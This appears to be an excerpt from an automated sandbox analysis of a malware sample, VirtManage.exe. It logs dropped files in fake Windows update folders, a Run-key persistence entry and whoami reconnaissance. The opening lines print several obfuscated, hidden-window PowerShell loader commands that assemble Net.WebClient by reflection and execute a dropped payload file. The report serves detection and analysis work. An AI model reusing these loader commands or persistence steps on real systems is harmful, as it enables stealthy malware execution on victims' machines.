Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Suspicious powershell command line found
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004014F0
Source: libgcrypt-20.dll.0.drStatic PE information: section name: /4
Source: libgpg-error-0.dll.0.drStatic PE information: section name: /4
Source: libnpth-0.dll.0.drStatic PE information: section name: /4
Source: libsqlite3-0.dll.0.drStatic PE information: section name: /4
Source: zlib1.dll.0.drStatic PE information: section name: /4
Source: gpg-agent.exe.0.drStatic PE information: section name: /4
Source: gpg.exe.0.drStatic PE information: section name: /4
Source: libassuan-9.dll.0.drStatic PE information: section name: /4
Source: oleview.exe.0.drStatic PE information: section name: fothk
Source: aclui.dll.0.drStatic PE information: section name: .xdata
Source: aclui.dll.0.drStatic PE information: section name: /4
Source: aclui.dll.0.drStatic PE information: section name: /19
Source: aclui.dll.0.drStatic PE information: section name: /31
Source: aclui.dll.0.drStatic PE information: section name: /45
Source: aclui.dll.0.drStatic PE information: section name: /57
Source: aclui.dll.0.drStatic PE information: section name: /70
Source: aclui.dll.0.drStatic PE information: section name: /81
Source: aclui.dll.0.drStatic PE information: section name: /97
Source: aclui.dll.0.drStatic PE information: section name: /113
Source: aclui-2.dll.19.drStatic PE information: section name: .xdata
Source: aclui-2.dll.19.drStatic PE information: section name: /4
Source: aclui-2.dll.19.drStatic PE information: section name: /19
Source: aclui-2.dll.19.drStatic PE information: section name: /31
Source: aclui-2.dll.19.drStatic PE information: section name: /45
Source: aclui-2.dll.19.drStatic PE information: section name: /57
Source: aclui-2.dll.19.drStatic PE information: section name: /70
Source: aclui-2.dll.19.drStatic PE information: section name: /81
Source: aclui-2.dll.19.drStatic PE information: section name: /97
Source: aclui-2.dll.19.drStatic PE information: section name: /113
Source: aclui.dll.19.drStatic PE information: section name: .xdata
Source: aclui.dll.19.drStatic PE information: section name: /4
Source: aclui.dll.19.drStatic PE information: section name: /19
Source: aclui.dll.19.drStatic PE information: section name: /31
Source: aclui.dll.19.drStatic PE information: section name: /45
Source: aclui.dll.19.drStatic PE information: section name: /57
Source: aclui.dll.19.drStatic PE information: section name: /70
Source: aclui.dll.19.drStatic PE information: section name: /81
Source: aclui.dll.19.drStatic PE information: section name: /97
Source: aclui.dll.19.drStatic PE information: section name: /113
Source: oleview.exe.19.drStatic PE information: section name: fothk
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_630A01F2 push 41100E0Ah; ret 1_2_630A023C
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6309A1F0 push ds; ret 1_2_6309A1F8
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6309FA9C push 41140E0Ah; ret 1_2_6309FAAA
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6309AC6B push ebx; iretd 1_2_6309ACF0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_6309ACE7 push ebx; iretd 1_2_6309ACF0
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsis7z.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI3323.tmpJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg-agent.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libgcrypt-20.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libnpth-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\zlib1.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\Users\user\AppData\Local\Temp\nsh85A.tmp\nsExec.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libgpg-error-0.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\LogUpdateWindows\aclui.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libassuan-9.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libsqlite3-0.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI32C4.tmpJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\aclui.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg-agent.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libgcrypt-20.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libnpth-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\zlib1.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libgpg-error-0.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\LogUpdateWindows\aclui.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libassuan-9.dllJump to dropped file
Source: C:\Users\user\Desktop\VirtManage.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\libsqlite3-0.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.dllJump to dropped file
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeFile created: C:\ProgramData\Microsoft\WindowsUpdate24\aclui.dllJump to dropped file

Boot Survival

barindex
Uses whoami command line tool to query computer and username
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Users\user\Desktop\VirtManage.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateOleviewJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateOleviewJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
